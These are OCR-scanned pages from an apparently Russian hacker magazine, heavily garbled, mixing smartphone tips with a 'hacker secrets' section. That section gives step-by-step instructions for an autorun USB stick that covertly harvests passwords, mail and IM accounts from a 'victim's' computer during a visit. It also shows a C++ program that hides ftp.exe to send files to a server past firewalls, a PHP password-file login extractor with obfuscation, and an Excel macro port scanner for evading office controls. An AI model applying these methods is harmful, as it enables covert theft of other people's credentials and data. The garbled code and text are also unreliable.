безопасность, железо и бизнес. Ежемесячно вы будете получать самую свежую 
инсрормацию по каждому направлению из журналов* и погружаться в интерак- 
тивный мир клуба на сайте ѵѵѵѵѵѵ.азизТС.ги. 



Новинки I 


ОБО ВСЕМ НОВОМ И УНИКАЛЬНОМ, ЧТО ЖДЕТ НАС В БУДУЩЕМ 




^ Бизнес | 


СОВРЕМЕННЫЕ ТЕХНОЛОГИИ И ТРЕНДЫ УСПЕШНОГО БИЗНЕСА 


Железо | 


ВСЕ САМОЕ ИНТЕРЕСНОЕ ИЗ МИРА КОМПЬЮТЕРНОГО ЖЕЛЕЗА 




Развлечения | 


ВСЕ, ЧТО НУЖНО ДЛЯ СОВРЕМЕННОГО ОТДЫХА 



* Журналы - участники проекта: «Страна Игр», «МАХІ іипіпд», «Свой бизнес», «Железо», «Хакер», «Мобильные Компьютеры». 




БѲЗОПДСНОСТЬ САМЫЕ СОВРЕМЕННЫЕ СПОСОБЫ 



НОВИНКИ | БИЗНЕС | РАЗВЛЕЧЕНИЯ | ЖЕЛЕЗО | БЕЗОПАСНОСТЬ 



І 5МАКТ 

ШШШЪШЙ ИСПОЛЬЗУЕМ 

! ;у коммуникаторы 

■ ПІ Ѵ1т4р А51І5 НА 100% 








Коммуникатор - это не просто тепесрон, особенно если это коммуника- 
тор Азиз. Столь мощные девайсы просто непростительно оставлять без 
дела, используя лишь традиционные срункции вроде телефонии, почты и 
мобильного интернета. Сегодня мы научим тебя выжимать из них максимум, 
используя всю мощь этих устройств для упрощения твоей жизни. 



На рынке мобильной аппаратуры сейчас представлены самые разные 
телефоны, смартфоны и коммуникаторы. Конечно же, последние пред- 
ставляют наибольший интерес: ведь насколько же приятно иметь при 
себе девайс, на котором можно использовать практически любой софт 

- зачастую аналогичный тем программам, которые мы устанавливаем на 
компьютеры. Для наших экспериментов мы взяли топовую модель комму- 
никаторов Азиз: сногсшибательный Азиз Р750. Девайс оборудован про- 
цессором с частотой 520 МГц, что большая редкость, 64 Мб оперативной 
памяти, имеет модули ВІиеіооіб, ѴѴі-Гі, СР2 и поддерживает сотовые сети 
третьего поколения, которые вот-вот станут доступны в России. Короче 
говоря, в этом коммуникаторе есть все, и мы ничем себя не ограничивали. 
Операционная система ѴѴІпсІоѵѵз МоЬІІе, установленная на коммуникаторах 
Азиз - это почти такая же ОС, как и обычная винда. Со своей архитекту- 
рой, особенностями, и, конечно же, инструментарием для разработчиков 

- 5ДК, который каждый вправе использовать по своему усмотрению. 
Именно поэтому программ для мобильной платформы ничуть не меньше, 



чем для обычного компьютера. Но не в 
наших целях сегодня разбирать стандарт- 
ные и всем доступные разработки. Куда 
интереснее, если ты сможешь использовать 
свой коммуникатор нестандартно, выжимая 
из него настоящий максимум. Вот наши семь 
рекомендаций, как это сделать. 

Противоугонная система 

Сделав дорогостоящую покупку всегда 
хочется обезопасить ее. И дело тут не 
только в покупке чехла и защитной пленки 
на экран. Как обезопасить себя от самого 
опасного - вора? Но высокие технологии 
были бы не высокими, если бы и на этот счет 
не придумали решение - хРау РДАГІлсіег. 
Если вдруг телефон окажется в чужих сетях 
и будет включен с «чужой» 5ІМ-картой, про- 
грамма тут же отправит 5М$ на указанный 
тобой номер. А в сообщении укажет: номер 
телефона, ІМЗГкод 5ІМ-карты, ІМЕІ комму- 
никатора, название и код сети, в которой 
зарегистрирован телефон. Все это быстро 
поможет тебе и компетентным органам найти 
потерянный/сворованный телефон. Тут есть 
одна хитрость. Если вор быстро сделает для 
коммуникатора так называемый НагсІ Резеі, 
то все установленные программы будут 
тут же удалены. Выходом из этой ситуа- 
ции является запись программы со всеми 
настройками в постоянную память устройст- 
ва. О том, как это сделать, можно подробно 
прочитать на сайте: 4рсІа.гиЛогит/іпсіех. 
рбр?збоѵѵ1:оріс=58768&5І:=0 . 

Больше памяти! 

Когда в системе остается мало памяти, ОС 
может послать всем приложением систем- 
ное сообщение ѴѴМ_НІВЕРЫАТЕ. Каждое из 
них должно освободить столько ресурсов, 
сколько это возможно: путем закрытия 
ненужных окон, остановки дополнитель- 
ных процессов и прочими способами. Идея 
хорошая, но почему это сообщение стоит 
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В этом месяце 

в других журналах клуба: 



ЖУРНАЛЫ-УЧАСТНИКИ: 



Железо | «Мобильные Компьютеры» 

«По сусекам за «АСУСТеКом». Руководство для покупателей ноутбуков 

Развлечения | «Страна Игр» 

«Игры в дороге». С чем лучше всего провести время в пути 

Новинки | «Железо» 

«Холодная война». Тестирование системной платы А51І5 Р5ЕЗ Ргетіит /ѴѴІГІ-АР @п Ебіііоп 



СТРАНА ИГР | МАХІ ТІІИІНС | СВОЙ БИЗНЕС 
ЖЕЛЕЗО | ХАКЕР | МОБИЛЬНЫЕ КОМПЬЮТЕРЫ 







посылать, когда системе уже стало 
плохо? Куда разумнее высвобождать 
память перед запуском, к примеру, 
тяжелого приложения вроде навигаци- 
онной системы с громоздкими картами. 
Если высвободить память заранее 
(отправить системное сообщение), то 
можно удержать систему от непремен- 
но стрессового состояния. И в этом 
поможет небольшая утилита Охіоз 
Метогу ( ѵѵѵѵѵѵ.охіоз.сот ). Все, что 
надо, это периодически запускать ее 
и каждый раз удивляться тому объему 
памяти, который удается получить в 
свое распоряжение, казалось бы, «из 
ничего». 



1ѴІ-ГІ сканер 



Ты серьезно думаешь, что для поиска 
беспроводных сетей не обойтись 
без ноутбука с установленным 
ІЧе^зІитЫег'ом или другой утилитой из 
набора беспроводного хакера? Тогда 
знай: коммуникатор Азиз Р750 спра- 
вится с этой задачей ничуть не хуже, а 
то и лучше - потому как спрятанное в 
карман миниатюрное устройство помо- 
жет просканировать эфир где угодно. 
Попробуй ради интереса устроить пу- 
тешествие с включенным ноутбуком, 
скажем, в Кремль:). 

Едва ли получится, а вот с коммуни- 
катором - запросто! Понятно, что стан- 
дартная тулза для работы с беспровод- 
ными сетями для этих целей не годится. 
Поэтому тебе придется поставить 
бесплатную утилиту ѴѴІГІГоГит (уууууу. 
азресІю-зоКѵѵаге.сот ). Поскольку ком- 
муникаторы Азиз оборудованы СР$, то 
каждая найденная точка будет помимо 
прочей информации сопровождаться 
координатами: широтой и долготой. По 
завершении прогулки ты, экспортиро- 
вав данные в КМІ_-файлик, можешь 
скормить его программе Соодіе ЕагИі и 
получить карту точек доступа, разме- 
ченную на снимке из космоса! 

Ин 



информация 
о пробках на ; 



Можно не только просмотреть обыч- 
ную векторную карту, но и взглянуть 
на местность со спутника. Качество 
поражает: на снимке отчетливо видна 
даже спутниковая антенна на крыше 
моего дома, а, значит, и некоторые 
проселочные дороги, которые на карте 
никогда не были отмечены. Но что 
еще может помочь водителю, кроме 
автоматического маршрута? Конечно 
же, информация о пробках! Такая воз- 
можность доступна пока только для 
жителей обеих столиц. Что интересно, 
в составлении оперативных данных 
об обстановке на дороге участвуют 
сами водители. С разрешения хозяина 
программа может передавать инфор- 
мацию о том, насколько быстро тот 
проехал тот или иной участок. Таким 
образом, помимо пробок, перекрытий и 
затруднений движения на карте также 
подсвечиваются свободные участки 
- улицы, по которым можно ехать 
быстрее 40 км/ч. И это максимально 
достоверная и актуальная информа- 
ция! 



Удаленное 

{ правление . 

омпьютером/сервером 

Имея при себе коммуникатор, ты 
всегда можешь обратиться к своему 
домашнему или рабочему компьютеру. 
Удаленный доступ к рабочему столу 
предоставляет отличная программа 
ѴІЧС Ѵіеѵѵег Іог РоскеіРС ( боте.иіаіт. 
еби/~тст5849/ѵѵіпсе/ѵпс.Іі)ппІ ). 

Причем неважно, какую операционную 
систему ты используешь дома: Ѵізіа, 
ІІЬипіи 1_іпих или что-то еще. В качестве 
серверной части, которую нужно будет 
установить, используется известней- 
ший продукт РеаІ ѴІ\ІС, имеющий версии 
как для винды и никсов, так и Мас'а. 

Для управления сервером зачастую 
удобнее использовать старый-добрый 
протокол 5$Н. К счастью, доступ к 
удаленной консоли можно получить с 
помощью специальной версии РиТТУ 
- РоскеіРиТТѴ ( ѵѵѵѵѵу.роскеірииѵ.пеі: ). 
Доступные фичи те же: поддержка 
самых разных протоколов, аутентифи- 
кации с помощью секретного ключа и 
многие другие. 



Экономим деньги 

на^нтернет-трафике Умное общение 



экране 

По правде говоря, я уже и забыл, 
когда пользовался обычной картой. А 
зачем? Если большинство карт давно 
доступны для просмотра на КПК, 
причем с возможностью поиска. Такую 
возможность совершенно бесплатно 
предоставляет продукт Мобильные 
Яндекс. Карты ( гпоЫІе.ѵапбех.ги/тарз ). 



Каждый из нас сталкивался с тем, что 
СРР5-трафик очень дорогой. Прихо- 
дится сдерживать себя, экономить, 
отключать картинки и т.д. - лишь бы 
баланс моментально не ушел в минус. 
Но имея при себе коммуникатор, у 
тебя есть возможность использовать 
так называемый компрессор тра- 
фика, благодаря которому удается 
передавать данные в сжатом виде 
и за счет этого серьезно экономить 
на количестве трафика! Насколько 
сильно экономить? В разы! (оопеі.пеі 
- это типичный представитель таких 
компрессоров и не в пример другим 
решениям совершенно бесплатный. 
Утилита устанавливается в систему в 
качестве локального прокси, поэтому 
все сетевые программы нужно обя- 
зать отдавать данные через прокси 
сервер: по умолчанию 127.0.0.1:8080. 
Программа эффективно жмет весь 
текстовый трафик, включая вложения 
в почте. Более того, принудительно 
сжимает изображения, в результате 
картинки получаются с заметно худ- 
шим качеством, но зато их не прихо- 
дится отключать полностью! 



Вот ведь парадокс. Независимо от 
того, находится ли человек за тысячу 
километров, или сидит в соседней ком- 
нате, все равно приходится набирать 
его номер. Тратить деньги, бороться с 
глюками сети. Но ведь если он совсем 
рядом, скажем, едет в соседнем авто- 
мобиле, то зачем использовать сото- 
вую связь? Ведь приема в этом месте 
может не быть вообще! Что тогда - ос- 
таться без связи? Ничего подобного! 
Если и у тебя, и твоего друга комму- 
никаторы с поддержкой ѴѴІ-ГІ, то вы 
легко можете воспользоваться этим. 
Программа 4ТаІк ( ѵѵѵѵѵѵ.4роске{5.сот ) 
позволяет наладить связь по ѴѴІ-Гі 
или ВІиеіооіІт. Причем утилиту можно 
использовать как в полудуплексном 
режиме (т.е. как рацию - один говорит, 
другой слушает), так и в полнодуп- 
лексном (разговор ничем не будет 
отличаться от обычного телефонного). 
А количество собеседников вовсе 
необязательно должно быть равно 
двум - их вполне может быть больше! 
В окне программы всегда отображает- 
ся, кто в настоящий момент находится 
в эфире. 
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ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХ ВЕЩЕЙ 



ВЛАДИМИР «ООТ.ЕНП» САВИЦКИЙ ШЖИД«СЙ® УУ ЬЕВ» Й СУПОб ЛЕОНИД «ВОЮ» СТРОЙКОВ АНДРЕЙ «5КѴ02М0Ѵ» КОМАРОВ 

/ КАІРОН.ІРЕ@ВК.ЯІІ / / СКАѴѴІ_ЕВНАСК@ВАМВІ.ЕВ.Пи / / ПОЮ@МАИ..ПІІ / / ГІІПѴНАѴѴК@НАМВІ.ЕП.ЯІІ / 



№1 

ЕДДШІ ИЗМЕНИТЬ ВИД РНР СКРИПТА, ОСТАВИВ ФУНКЦИОНАЛЬ- 
НОСТЬ НА ПРЕЖНЕМ УРОВНЕ 

РЕШЕНИЕ: 

Зачастую нам требуется видоизменить тот или иной двиг/сорец на ПХГІ. 
Причины могутбыть разные: отшифрования содержимого до нарушения 
копирайтов. Утилы для шифрования не всегда удобны, поэтому воспользу- 
емся обфускатором РНР кода. Действовать будем на конкретном примере. 

1. Есть подопытный РНР скрипт: 

$бп=бореп ( "Е : Храззѵлі. ЬхС " , "г " ) ; 
іб(!$бп) { есііо ( " Сап ' С ореп раззѵгсі . СхС " ) ; } еізе { 
ѵ?Ъі1е ( ! беоб ( $бп) ) { 

$пр=бдеСз ($бп) ; 

$зСг=зі:ггеѵ ($пр) ; 

$1одіп=зиЪзСг ( зііггсЪг ( $зСг 1 ) ; 

$геѵ=з1:ггеѵ ($1одіп) ; 

$бр=бореп ( "Е : \1одіпз . СхС " , "а" ) ; 
брибз ( $бр , " $геѵ\п" ) ; 
бсіозе ( $бр) ; 

} бсіозе ( $бп) ; 

} 

Комментировать суть скрипта не буду, скажу лишь, что он выдираетлогины 
юзеров из раззѵѵсі-файла. 

2. Заходим на ЬНрУЛагап.зи/аЫУ и загружаем наш скрипт. После чего 
жмем батон «60». 

3. Сохраняем полученный скрипт. Какуказано на сайте: «РНРаЫ : Ье1;а ѵО.1 
это обфускатор РНР кода. Сама обфускация заключается в изменении имен 



переменных и функций, а также удалении лишних символов, в результате 
чего затрудняется понимание кода. Структура самой программы (последо- 
вательность функций и операторов) не меняется. Процент работоспособ- 
ности скриптов после обработки — порядка 70% (возможны проблемы в 
скриптах, использующих ООП). В общем, кому интересно — пробуем :)». 

4. Открываем сохраненный скрипт и смотрим содержимое: 



$сьоваьз [ ' 

$СЬ0ВАЬЗ [ ' ' ] = 

$СЬ0ВАЬЗ [ ' ' ] = 

$СЬ0ВАЬ5 [ ' ' ] = 

$СЬ0ВАЬЗ [ ' 

$СЬ0ВАЬЗ [ ' 

$СЬ0ВАЬЗ [ ' 

$СЬ0ВАЬЗ [ ' 

$ =$СЬОВАЬЗ [ ' 
іі ( ! $ ) { есЪо ( "Сап 

ѵгііііе ( ! $СЬОВАЬ5 [ ' 

$ =$СЬ0ВАЬЗ [ ' 

$ =$СЬОВАЬЗ [ ' 

$ =$ОЬОВАЬЗ [ ' 
$ =$СЬОВАЬ5 [ 
$ =$СЬОВАЬЗ| 

$СЬОВАЬЗ [ ' 
$СЬОВАЬЗ [ ' 

} 

$СЬОВАЬЗ [ ' 

} 



1 \х66\хбР\х70\х65\хбЕ" ; 

" \х66\х65\хбР\х66 " ; 

\хб6\х67\х65\х74\х73 " ; 

=" \х73\х74\х72\х72\х65\х76 " ; 

] =" \х73 \х75\х62 \х73\х74\х72 " ; 

' ]="\х73\х74\х72\х72\хб3\х68\х72" 
' ]="\х66\х70\х75\х74\х73" ; 

' ] =" \х66\х63 \х6С\хбР\х73 \х65 " ; 

1 ] ( "Е: ХраззмЦ. ЬхЬ " , "г" ) ; 

'Т ореп раз з\л7Й. РхЬ" ) ; } еізе { 

’] ($ ) ) { 

Ч ($ ) ; 

']($ ) ; 

’ ] ( $СЬОВАЬЗ [ ’ ’ ] 

']($ ) ; 

’ ] ( " Е : \ Іодіпз . 1 :х 1 : " , " а " ) ; 
’]($ ,"$ \п" ) ; 

']($ ) ; 

' ] ( $ ) ; 



5. Убеждаемся в работоспособности скрипта и радуемся. 

5а. Перед заливкой потри все комменты, ибо обфускатор неумеетс ними 
работать. 




ЗАДАЧА: 



] БЫСТРО И НЕЗАМЕТНО СЛИТЬ ПАРОЛИ С ЛОКАЛЬНОГО 
КОМПА НА ФЛЕШКУ 
РЕШЕНИЕ: 



Вопрос о создании флешки «ближнего боя» известен давно. В зависимости 
от ОС, нужд и требуемых результатов он решался по-разному. Существует 
относительно простой способ подготовить носитель оперативного исполь- 
зования. Все, что оттебя потребуется — это прямые руки и четкое соблюде- 
ние описанных ниже инструкций. Приступим. 

1. Сливаем утилу УСВТЫеП которую мы заботливо выложили длятебя на 
нашем 0Ѵ0. 

2. Распаковываем архив и смотрим содержимое папки: 



• ЬаСехе 



• ісопз 

• Бшпр 

• пігстсі.ехе 

• аиСогип. іпб 

3. Копируем содержимое себе на флешку, не забыв про авторан: 
[аиЪогип] 

асСіоп=Ореп Рііез Оп Еоісіег 
ісоп=ісопз\с!гіѵе . ісо 

зЪе11ехесиСе=пігстсІ. ехе ехестсі САКЪ Ьабехе\ргодзбагС . 
ЪаС 

4. Приходим в гости к потенциальной жертве. Улучив момент, подходим к 
компу и вставляем флешку в свободный разъем. Ждем примерно минуту и 
вынимаем носитель. 
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5. Довольствуемся урожаем, среди которого: 



• Данные об открытых портах 



• Аккаунты к ІМ- клиентам 

• Мыльные аккаунты 

• Сохраненные логины/пароли в ослике 

• Журнал посещений 

• Информация об ОС , апдейтах, лицензиях, ебс 



Это далеко не полный список того, что ты можешь выловить в папке 
/Битр после похода в гости. Кстати, утила функционирует практически 
незаметно. Так что, не опасаясь разоблачения, можешь дать флешку 
товарищу якобы, чтобы слить у него музыки/софта. 



№3 



ІЗАДАЧА: 



РЕШЕНИЕ: 

Иногда одного-двух проксиков бывает недостаточно. Это может быть вы- 
звано особенностью софта или поставленной задачей. Требуются большие 
прокси-листы, но отдавать за них деньги из собственного кармана не очень 
приятно. Можно обратить внимание на паблик-прокси. Они отлично подой- 
дут для использования в сканерах (и другом полезном софте). Возникает 
лишь одна проблема — сбор проксиков с веба. 

1. Работать будем со скриптом ргохудгаЪЪег . ркр: 

зеб_біте_1ітіб ( 0 ) ; 

іб ( ! іззеб ( $_РОЗТ [ 1 бііепаше ' ] ) ) { ехіб ( 0 ) ; } 

$шазк = '/[0-9] {1,3} \\. [0-9] {1,3} \\. [0-9] (1,3}\\. [0- 
9] {1,3} : [0-9]+/’ ; 

$6(3 = бореи ($_РОЗТ [ 1 бііепаше '] , "гб") ог сЗіе ( "Сап' б ореп 
бііе" ) ; 

$зібе_1ізб = ехрІосЗе ( " \п" , бгеасЗ ( $6(3, 9999)); 
богеасЪ ($зібе_1ізб аз $зібе) 

{ 

іб ( ($зібе_6с! = 6ореп($зібе, "гб")) !== баізе) 

{ 



ѵйіііе ( ! беоб ( $зібе_бсЗ) ) 

{ 

$3бг = " " ; 

$збг = бдебз ( $зібе_бсЗ, 1024) ,* 
іб (ргед_шабс1і ( $шазк, $збг, $ір) ) 

{ 

ес1іо$ір[0] . "<Ъг>"; 

} 

} 

} 

} 

2.Товарищ_ЗІі : заботливо написал хтмл-форму для удобной заливки фай- 
лов слинками на прокси-листы (лежитвместе со скриптом на нашем 0Ѵ0). 
3. Заливаем граббер на сервер, указываем файл слинками на прокси-лис- 
ты (напарсишь в Гугле без особых проблем) и жмем «5іагІ». Файл должен 
иметь вид: 

Ьббр: / /шш. зібе . сош/іізбі .Ьбші 
Ьббр: / /-тш. зібе . сош/1ізб2 .Ьбші 
Ьббр: / /-тш. зібе . сош/1 ізбЗ .Ьбші 
Ьббр : / /-тш. зібе2 . сош/іізбі .Ьбші 
Ьббр : / /ѵгѵт. зібеЗ . сош/1ізб2 .Ьбші 
Ьббр : / /-тш. зібе4 . сош/ІізбЗ .Ьбші 

4. Собственно, все. Довольствуемся результатом. 

Скрипт достаточно шустрый, одна ко ты вполне можешь замутить много- 
поточность, переписав его на перле. В общем, какдобывать проксики 
— решать тебе :). 




показать вложенностьдиректорий. Завершим создание переменной с пара- 
метрами, используя сот_Ш1е: 



ЗАДАЧА: 



з НАПИСАТЬ ПРОСТОИ І-ОАРЕК НА С++ 

РЕШЕНИЕ: 



Заливать файл на сервер будем по Йр при помощи стандартной виндовой 
утилы Йр.ехе. Процесс автоматизируем небольшой прогой на С++. Одно 
из преимуществ этого метода — обход криво настроенных файрволов, 
так каку большинства незадачливых владельцев «огнестенок» команд- 
ная строка (через которую, собственно, и работает майкрософтовский 
фтп- клиент) находится в списке доверенных приложений. Вооружившись 
компилятором, приступим крешению. 

1 . При запуске [{р.ехе программе необходимо передать два параметра: путь до 
файла с командами и имя (либо ІР) хоста. Допустим, наиболее безопасным мес- 
том для создания файла будет виндовая директория. Забросим в переменную 
сот_Ш 1 е путь в ида X : \ ШЫЕЮМ5 \ Лі:р_соішапсІз : 



сііаг сош_бі1е [256 ] ; 
сііаг т_с1іг[256] ; 

СебМ’іпсІоѵ/зБігесбогу (т_сІіг , зігеоб (т_с!іг) ) ; 

збгсру (сош_бі1е, т_с1іг) ; 

збгсаб (сош_бі1е, "\\ббр_соттапсІз" ) ; 



Здесь все предельно понятно, стоитл ишь обратить внимание на двойной 
бэкслеш (\\) вместо одинарного. Его нужно использовать везде, где необходимо 



сЪаг рагаш[128] ; 
збгсру (рагаш, "-з:"); 
збгсаб (рагаш, сош_бі1е) ; 
збгсаб (рагаш, " "); 
збгсаб (рагаш, "шу-бюзб . сош" ) ; 

В результате в переменной рагагп получим: «~з:Х: \т ШЮМЗ\&р_ 
соттапсіз ту-козЬ . сот». 

2. Начинаем общение с сервером. Путьдо файла с командами определили, а с 
самим файлом не поработали. Исправим это: запишем в него последователь- 
ность команд, передаваемых кр-шнику. 



Великий и могучий 
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обзбгеат оЕ (сот_:Еі1е) ; об<< ,, ту1одіп"<<епс11; 
об<< "туразз "<<епс11 ; о^«"ссі ШМ"«еп<і1 ; о^«"зепй " « 
"Б: \\ѴШПЭОѴ/5\\гедесІіЬ . ехе" « " " « "гедесИб . ехе" « 
еп(51 ; о^«"диі1:"; оі.сІозеО; 

Передаем логин и пароль. Строчкой «ссі <имя_папки>» меняем директорию 
(если требуется). Командой зепсі[зеп(2 <локальный_файл> <файл_на_ 
сервере> ) будетпослан экзешникс редактором реестра. Нуа строчкой 
«диі ѣ » попрощаемся с фтп-шником сервера. 



3. Воспользуемся функцией ЗйеІІЕхесиЬе () для запуска ТСр.ехе. Третьим 
параметром покажем намерение запустить виндовый фтп-клиент, а четвертым 
передадим подготовленную строку с параметрами для него. Чтобы не беспо- 
коить пользователя, укажем ЗМ_НІБЕ — и консольный запуск^ір. ехе пройдет 
незаметно. Набираем: 

ЗЪеІІЕхесиРе ( О ,ШЬЬ, "ббр", рагаш, ШЬЬ, 5И_НІБЕ) ; 

Готово. Компилируем, запускаем, проверяем Кр-сервер. 




яркие обои, оповещающие о включенном ВЬасІоѵѵМосІе (настраивается 
через Орііопз ѴѴаІІрарег). С этого момента можно выполнять любые 
действия. Вот что было опробовано мною: 



ЗАДАЧА 



^ СОЗДАТЬ ПЛАЦДАРМ ДЛЯ ЭКСПЕРИМЕНТОВ НА 
РАБОЧЕЙ ВИНДЕ 

РЕШЕНИЕ: 



Отбросим в сторону скучные виртуальные машины, создание «слеп- 
ков», копий системы и использование соседского компьютера для 
тестов необычного софта. Есть более дешевый в плане времени и сил 
способ. 

1. Работать будем все стой же осью, приветственный экран которой 
видим каждый день. Могу уверить, что все нижеописанное испробовал 
лично и ничего с твоими форточками не случится. Итак, ставим почти 
бесплатную прогу ЕЬасІоѵѵІІзег Рго. Принцип работы основан на том, что 
«слепок» системы не создается, а ведется четкая история ее изменений 
(что экономит место на винте). 

2. Выбираем Сопбдигаііоп на панели слева. Первая вкладка (Ѵоіитез) 
предоставляет нам список дисков, за изменениями которых будем 
следить. При тестах утил, которым мы не доверяем или не имеем 
понятия об их направленности, лучше перестраховаться и выбрать АН 
Ѵоіитез. В противном случае какой-нибудьтрой вольготно устроится 
на незащищенном носителе и продолжит свое существование после 
перезагрузки. 

3. Следующая вкладка (Ехсіизіоп І_ізі) позволяет создавать список 
папок, изменения в которых отменяться не будут. В папки будем скла- 
дывать результаты работы (логи, конфиги — все, что угодно), которые 
останутся нетронутыми при возврате к первоначальному состоянию 
системы. Минимальная подготовка закончена, приступим ктестам. 

4. Режим, в котором можно свободно экспериментировать, называется 
«БЬасІоѵѵМосІе». Он запускается щелчком по кнопке Мосіе и выбором 
Асііѵаіе. Действовать режим начнеттолько после перезагрузки, о чем 
будет выведено предупреждение. Перезагружаемся. Сразу заметны 



— копирование /удаление /изменение файлов; 

— инсталляция и деинсталляция программ; 

— добавление /удаление разделов и значений реестра; 

— изменение параметров автозагрузки в шзсопбід; 

— изменение параметров запуска и работы сервисов; 

— изменение сетевых настроек; 

— смена стиля Винды, обоев и скрытие панели задач; 

— запуск практически безобидного троянчика 

Наигрался? Пора возвращать все на свои места. Находим в трее 
ЗЬасіоѵѵІІзег и отключаем режим ЗЬасІоѵѵМосІе, выбрав І_озе_АИ_ 
СЬапдез и приняв предложение перезагрузиться. После перезаг- 
рузки видим отсутствие любых изменений, внесенных при работе в 
БЬасІоѵѵМосІе. Удобно? И не говори :). 




4№№н -»■ 



Збабо^Узег Рго 



Типичный цикл 





ЗАДАЧА: 



| ИЗБЕЖАТЬ МНОГОКРАТНОГО ВЫПОЛНЕНИЯ ЦИКЛА 
ПРИ ПОШАГОВОЙ ОТЛАДКЕ ПРОЦЕССА 
РЕШЕНИЕ: 



Всем известно, что практически любая программа использует 
циклы в очень большом количестве. Они могут быть сгенерирова- 
ны при компиляции даже там, где, казалось бы, их быть не долж- 
но. Очень утомляет, когда при пошаговой отладке в ОІІуОЬд (по 
нажатию клавиши <Р7> или <Е8>) программа крутит цикл десятки 
и сотни раз. Наблюдать за этим нет никакого смысла, если только 
во время выполнения не генерируется какое-либо значение. Как 
избежать «зацикливания» при пошаговой отладке? Ответ проще, 
чем ты думаешь. Конструкция цикла обычно выглядит следующим 
образом : 
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СМР регистрі , регистр2 ; сравнение двух значений 
[Оператор_условного_перехода] адрес; условный переход 
на указанный адрес 

Оператор условного перехода является одной из инструкций: 
Іе, Де, }г, іпг. Все они проверяют состояние регистра флагов, 
биты которого принимаютто или иное значение в зависимости 
от результата выполненной операции (чаще всего — операции 
сравнения — «СМР»). Как правило, адрес, на который указы- 
вает инструкция условного перехода в случае цикла, меньше 



адреса, по которому располагается сам переход (то есть, меньше 
содержимого регистра ЕІР на момент выполнения инструкции 
перехода). 

Можно сделать простой вывод — цикл должен быть выполнен не 
пошагово, а в режиме исполнения программы. После чего необходимо 
приостановить ее. 

1. Поставить точку останова на инструкцию, следующую сразу после 
операции условного перехода (<Р2> в ОІІуОЬд). 

2 . Запустить программу на исполнение (<Р9>). 

3. После остановки программы на брейкпоинте продолжить ее выпол- 
нение в пошаговом режиме (<Р7> или <Р8>). 




ЗАДАЧА 



] ПРОСКАНИРОВАТЬ ПОРТЫ УДАЛЕННОЙ МАШИНЫ С 

ПОМОЩЬЮ ЕХСЕІ. 

РЕШЕНИЕ: 



Представь, что ты в строгом офисе, где мало возможностей для хакер- 
ских шалостей. Потребуется пошалить, а именно — автоматизировано 
просканировать порты удаленной машины, находясь в условиях замкнутой 
(изолированной) программной среды, в которой запрещено использование 
стороннего софта (в нашем случае, сканеров портов). 

Прибегая кдействиям по ограничению свободы работников, администра- 
тор рискует столкнуться с человеческим фактором: «чем больше пытаются 
эшелонировать защиту и снизить риск атак в кругу своих коллег, тем больше 
интереса и действий с их стороны последует». 

В качестве варианта решения предлагается воспользоваться простым 
средством, доступным каждому — МісговоЙ Ехсеі. 

1. Создадим произвольный файл Ехсеі. Теперь сделаем маленькую разметку 
и приступим кпрограммированию, а именно написаниюзлого ѴВА-мак- 
роса. Макрос прост— втаблице обозначим поля для диапазона портов и, 
собственно, хоста. 

2 . Переходим в меню «Сервис -> Макрос -> Макросы» и жмем на кнопку 
«Создать», предварительно назвав макрос прямым именем «РогіЗсап». 

3. В открывшемся окне редактора вобьем мой вариант макроса (ищи на 
0Ѵ0). Суть макроса поймет даже ребенок — идет обозначение переменных 
(втом числе, сетевых), присвоение им значений ячеек, а затем, собственно, 
сканирование каждого порта и... завершение работы нашего чудо-сканера. 

4 . Наслаждайся жизнью и помни, что этотсканер можно при желании и 
наличии прямых рук превратить в полноценный эксплойт. И никакой адми- 
нистратор не догадается. 

Релиз моего портсканера ты также можешь взятье нашего сайта ( хакер. 
ги/ро5І:/22983/сіеІ : аи[Са5р ). 
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Результат получен — мы выявили РТР-сервер : 
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ЗАДАЧА: 



| СОБРАТЬ С ОДНОГО ХОСТА ВСЕ ПОДДОМЕНЫ 

РЕШЕНИЕ: 



Воспользоваться услугами сІотаіпзсІЬ и прочими ресурсами — ва- 
риант известный. Я же предлагаю принципиально новый, а главное, 
действенный прием по разведке доступных поддоменов. В этом нам 
помогут Ѳоодіе-группы ( ШрѴ/дгоирв.доодІе.сот ). Дело в том, что 
Соодіе индексирует сайты и их поддомены в качестве групп. Зачастую 
туда попадают и отличные по контенту вещи. С помощью разумного 
парсинга ты получишь желаемый результат. Итак, для успешной раз- 
ведки тебе нужно: 



1. Поставить поддержку РуіЬоп на твой сервер. 

2 . Целиком и полностью довериться моему парсеру, который обраща- 
ется к боодіе- группам по целевому хосту, выдирает из страниц ответа 
ВСЕ возможные поддомены и... предоставляет их тебе! Не жизнь, а 
сказка (скрипт, естественно, лежит на нашем 0Ѵ0). 

3. Наслаждаться моей добротой :).ПС 
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ОБЗОР эксплойтов 



ПОСЛЕ ПОТОКА ИНТЕРЕСНЫХ ДЫР НЕОЖИДАННО НАСТУПИЛО ЗАТИШЬЕ. ЗА ПОСЛЕДНЕЕ ВРЕМЯ 
НЕ ОБНАРУЖЕНО НИ ОДНОЙ ЗНАЧИТЕЛЬНОЙ УЯЗВИМОСТИ, КОТОРУЮ МОЖНО ИСПОЛЬЗОВАТЬ 
ДЛЯ МАССИРОВАННЫХ ХАКЕРСКИХ АТАК. ПОЭТОМУ ПРИХОДИТСЯ ДОВОЛЬСТВОВАТЬСЯ ДИЧЬЮ 
ПОМЕНЬШЕ, БЛАГО, ТАКОВАЯ ИМЕЕТСЯ, А ЗАПЛАТКИ — ОТСУТСТВУЮТ. КАК СЛЕДСТВИЕ, В СЕТИ 
НАХОДИТСЯ КУЧА БЕЗЗАЩИТНЫХ РАБОЧИХ СТАНЦИЙ И СЕРВЕРОВ. 



МІСР050РТ 

ѴѴШЦ0ѴѴ5 

М I ОШИБКА 
0М5-КЛИЕНТА 



» Вгіе? 



МісгозоЙ продолжает радовать нас 



новыми и старыми дырами, перехо- 
дящими из одной версии ѴѴіпсІоѵѵз в 
другую. Первые атаки на ОЫБ-прото- 




МісгозоЙ упорно отказывается 
признавать наличие дыры! 



кол были зафиксированы в далеком 
1 989 году и сводились к генерации 
подложного ОМБ-ответа, который, 
тем не менее, воспринимался жерт- 
вой как подлинный «благодаря» 
слабости механизма аутентифика- 
ции. Хакеры атаковали ОЫБ-сервера 
провайдеров или крупных и мелких 
фирм, обращающиеся к вышестоя- 



щим ОЫБ-серверам и кэширующие 
полученные отних (или от хакера) 
ответы. Образовывался устойчивый 
очагзаражения (роізопесі 0Ы5- 
зегѵег) — пользователь, например, 
пытался разрешитьдоменное имя 
